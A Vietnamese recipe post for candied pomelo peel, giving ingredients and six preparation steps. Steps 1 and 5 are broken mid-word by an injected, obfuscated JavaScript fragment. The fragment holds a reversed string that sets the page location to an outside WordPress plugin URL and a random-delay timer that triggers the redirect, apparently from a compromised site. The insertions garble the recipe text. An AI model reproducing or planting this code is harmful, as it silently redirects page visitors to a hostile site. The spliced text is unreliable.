Cách làm mứt vỏ bưởi ăn hay hay

Vỏ bưởi thường được gọt bỏ đi nhưng mất công một chút, bạn có thể biến nó thành món mứt ngon, với vị cay nhẹ, thơm dịu, ăn không ngán, lại phòng chống được ho khi thời tiết trở lạnh.

Mứt vỏ bưởi

Nguyên liệu:
– Vỏ của 2-3 quả bưởi
– 1 viên phèn chua nhỏ
– Muối, đường.
Cách làm:

Bước 1:
– Vỏ bưởi rửa sạch, cắt sợi hay bản toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} to tùy theo sở thích của bạn.

Bước 2:
– Cho vỏ bưởi vào âu nước muối được pha thật mặn, ngâm khoảng 4-5 tiếng.
– Sau đó xả lại nhiều lần nước để không còn mặn.

Bước 3:
– Đun nước sôi cho thêm phèn chua vào đun cùng đến khi phèn chua tan thì cho vỏ bưởi vào, đun khoảng 10 phút, vớt ra xả lại nước lạnh cho thật ráo.
– Bạn ăn thử nếu phần vỏ còn vị đắng nhiều thì bạn đun nước muối loãng cho vỏ bưởi vào đun khoảng 10 phút, vớt ra xả lại nước lạnh cho thật sạch, đến khi thấy vỏ chỉ còn vị cay nhẹ thì vớt ra rổ, vắt ráo.

Bước 4:
– Bưởi sau khi vắt ráo, cân được 700g vỏ bưởi thì cho thêm 400g đường vào, trộn đều để khoảng từ 5 đến 6 tiếng.

Bước 5:
– Cho bưởi vào nồi, bắc lên bếp đun lửa nhỏ, thỉnh thoảng đảo đều đến khi đường tan hoàn toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} toàn thì tắt bếp.

Bước 6:
– Để nguội xếp ra vỉ khoảng 1 ngày, sau đó cất vào lọ dùng dần.
Cún Khang